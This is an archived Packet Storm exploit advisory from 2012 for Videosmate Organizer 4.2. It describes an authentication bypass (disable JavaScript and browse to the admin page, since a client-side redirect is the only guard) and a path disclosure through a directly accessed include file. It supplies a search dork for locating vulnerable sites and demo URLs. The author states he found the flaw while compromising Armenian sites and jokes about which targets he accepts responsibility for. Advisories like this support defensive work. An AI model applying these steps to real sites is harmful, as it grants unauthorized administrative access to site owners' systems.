what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure

Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure
Posted Oct 16, 2012
Authored by Akastep

Videosmate Organizer version 4.2 suffers from authentication bypass and path disclosure vulnerabilities.

tags | exploit, vulnerability, bypass, info disclosure
SHA-256 | 880befa250d4287f9d17efed7dffd5623e713602127613fb7304b05c5fb437f4

Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure

Change Mirror Download
=====================================================================
Vulnerable software: Videosmate Organizer V 4.2 (all versions)
Vendor: http://videosmate.com/
Software License: Commercial
Vulns: Authentication Bypass & Path Disclosure
Risk: Critical
Dork: intext:Powered by Videosmate Organizer
=====================================================================
Vuln Description:
As i noted above this script is commercial and that's why today i'm unable(may be lazy) to show you whereis vulnerability.
I discovered this vulnerability while owning armenian sites.
Flaw in that if the remote user is not authenticated against admin panel ( somesite.tld/sitedb/admin/ )
it seems script (after session checking thing) is unable to properly kill it's execution.
Since i have no access to source code of this script i'll try to imagine how this process goes:


Suppose:

<?php
session_start();

if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>";

/*
Notice:
echo 'JS_REDIRECTION';
** not **
die('JS_REDIRECTION');
*/





/****** PWNED ********/
//YOU ARE ADMIN HERE//
?>


Exploitation is simple like 2x2:

Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php
(If you wonder then press CTRL+U you will see somethink like:

<script> self.location='login.php';</script>
<script> self.location='login.php';</script>
)



Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php (<=Disable javascript in your browser or use NoScript then surf there)



This is not end!! 111))

PATH DISCLOSURE: Direct access to:
site.tld/componentdemo/include/categoryfuncs.php

Demo:
http://www.videosmate.com/componentdemo/include/categoryfuncs.php


Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7

Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7

Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7

Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
Error, query failed




Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))


=====================================================================

SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
=====================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
=====================================================================

/AkaStep


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close